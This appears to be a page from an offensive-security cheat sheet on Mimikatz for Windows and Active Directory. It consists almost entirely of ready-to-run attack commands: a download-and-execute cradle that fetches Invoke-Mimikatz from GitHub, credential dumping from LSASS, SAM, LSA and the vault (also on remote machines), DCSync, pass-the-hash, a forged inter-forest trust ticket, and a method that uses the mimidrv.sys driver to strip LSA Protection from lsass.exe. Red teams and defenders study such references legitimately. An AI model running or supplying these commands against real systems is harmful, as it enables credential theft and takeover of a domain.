Mimikatz
Dump Credentials
# Download and execute in cradle
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')
#Dump creds from memory
Invoke-Mimikatz -DumpCreds
# DCSync Attack
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:security.local /user:moe"'
# Dump local passwords
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'
# Dump Credential Vault
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'
# Dump credentials on remote systems
Invoke-Mimikatz -DumpCreds -ComputerName @("WS01","WS02")
Dump Domain Credentials
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Spawn PowerShell (with compromised NTLM hash)
Invoke-Mimikatz -Command '"sekurlsa::pth /user:DomainAdmin /domain:Security.local /ntlm:b38ff50264b7458734d82c69794a4d8 /run:powershell.exe"'
Forge Inter-domain trust ticket
# Obtain trust key between current domain and external domain
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
# An inter-forest TGT can be forged
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:Security.local /sid:S-1-5-21-1874506000-3219952063-538504511 /rc4:815720462a1b48256f16740b70356b7f /service:krbtgt /target:Vault.local /ticket:C:\AD\trust_forest_tkt.kirbi"'
Over pass the hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:Security.local /ntlm:<ntlmhash> /run:powershell.exe"'
Protection Bypass
The below image represents an attempt to access the lsass.exe process and extract clear text passwords and run a skeleton key attack. As we can see this has not been successful since applying the registry key change mentioned in the mitigation section for LSA Protection.

We can check if the LSA Protection RunAsPPL key exists by querying the registry to confirm the LSA protection is in place.
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "RunAsPPL"
# Value 0x1 means LSA Protection is enabled
This can be bypassed by utilizing the mimidrv.sys
driver file which is included as a separate file with mimikatz.
The driver can be loaded by running the command !+
in Mimikatz
. After doing so the following command can be execute to protect the mimikatz.exe
process.
!processProtect /process:mimikatz.exe
The same command with the /remove
flag can be used to strip the process protection from a process such as lsass.exe
!processprotect /process:lsass.exe /remove
From here we should be free to perform actions against LSASS and dump credentials from it.
mimikatz.exe sekurlsa::logonpasswords
Last updated